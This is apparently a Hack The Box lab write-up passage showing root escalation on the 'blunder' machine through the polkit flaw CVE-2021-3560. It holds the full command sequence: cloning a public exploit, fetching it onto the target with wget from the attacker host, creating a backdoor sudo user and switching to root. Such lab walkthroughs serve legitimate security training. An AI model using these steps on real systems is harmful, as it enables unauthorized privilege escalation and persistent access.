CVE-2021-3560
As discovered previously, there is an active polkit process in the target system, which could be vulnerable to CVE-2021-3560
a vulnerability was found in polkit (affected version not known). It has been rated as critical. Affected by this issue is an unknown code of the component D-Bus Request Handler. The manipulation with an unknown input leads to a authorization vulnerability. Using CWE to declare the problem leads to CWE-863. The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. Impacted is confidentiality, integrity, and availability.
exploit
I found an exploit online
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ git clone https://github.com/UNICORDev/exploit-CVE-2021-3560.git ; tar -czf CVE-2021-3560.tar.gz exploit-CVE-2021-3560
Cloning into 'exploit-CVE-2021-3560'...
remote: Enumerating objects: 213, done.
remote: Counting objects: 100% (80/80), done.
remote: Compressing objects: 100% (76/76), done.
remote: Total 213 (delta 27), reused 11 (delta 4), pack-reused 133
Receiving objects: 100% (213/213), 55.58 KiB | 2.22 MiB/s, done.
Resolving deltas: 100% (78/78), done.Downloading the Exploit package to Kali
Exploitation
www-data@blunder:/dev/shm$ wget -q http://10.10.14.17/CVE-2021-3560.tar.gz ; tar -xf CVE-2021-3560.tar.gz ; cd exploit-CVE-2021-3560Delivery complete over HTTP
www-data@blunder:/dev/shm/exploit-CVE-2021-3560$ python3 exploit-CVE-2021-3560.py
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. Y / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_______|__\____/_/|_/___/\___/\____/_/|_/____/....
unicord: Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation
username: unicord
password: unicord
depends: Dependencies for exploit are met!
exploit: New user created!
prepare: New password hash generated!
exploit: Password configured for new user!
success: Created Sudo user "unicord" with password "unicord"!Executing
successful exploitation creates a sudo user; unicord:unicord
www-data@blunder:/dev/shm/exploit-CVE-2021-3560$ su unicord
password: unicord
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
unicord@blunder:/dev/shm/exploit-CVE-2021-3560$ sudo su root sudo su root
sudo su root
We trust you have received the usual lecture from the local System
administrator. it usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
password: unicord
root@blunder:/dev/shm/exploit-CVE-2021-3560# whoami
root
root@blunder:/dev/shm/exploit-CVE-2021-3560# hostname
blunder
root@blunder:/dev/shm/exploit-CVE-2021-3560# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.191 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:30a prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:30a prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:03:0a txqueuelen 1000 (Ethernet)
RX packets 4719206 bytes 412658025 (412.6 MB)
RX errors 0 dropped 197 overruns 0 frame 0
TX packets 3615006 bytes 2490213235 (2.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 27130 bytes 2391926 (2.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 27130 bytes 2391926 (2.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise